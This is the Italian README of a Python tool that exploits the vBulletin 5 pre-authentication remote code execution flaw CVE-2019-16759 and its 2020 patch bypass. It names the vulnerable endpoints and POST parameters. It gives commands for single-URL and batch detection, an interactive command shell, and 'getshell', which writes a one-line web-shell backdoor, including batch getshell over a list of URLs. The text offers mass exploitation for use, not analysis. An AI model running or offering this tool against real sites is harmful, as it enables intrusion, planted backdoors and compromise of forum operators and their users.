
CVE-2019-16759 vbulletin 5.0.0 fino a 5.5.4 rce pre-autenticazione
Nel settembre 2019, vbulletion5 (5.0.0-5.5.4) ha avuto una vulnerabilità rce (CVE-2019-16759); sfruttando il file ajax/render/widget_php e il parametro POST widgetConfig[code] è possibile eseguire direttamente codice in remoto.
L'11 agosto 2020, è stato divulgato online che la patch per CVE-2019-16759 può essere aggirata; sfruttando ajax/render/widget_tabbedcontainer_tab_panel e costruendo il parametro POST subWidgets[0][config][code], è possibile eseguire direttamente codice in remoto.
Questo strumento supporta il rilevamento su singolo URL, cmdshell, il recupero di una web shell (scrittura di una backdoor in una riga), il rilevamento in batch e getshell in batch.
python2.7
pip install requests
Utilizzo: python vbulletin5-rce.py -h

Rilevamento della vulnerabilità su singolo URL: python vbulletin5-rce.py -u "http://www.xxx.com/"


cmdshell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell


getshell su singolo URL: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell


Rilevamento in batch: python vbulletin5-rce.py -f urls.txt

getshell in batch: python vbulletin5-rce.py -f urls.txt --getshell

gmail: [email protected]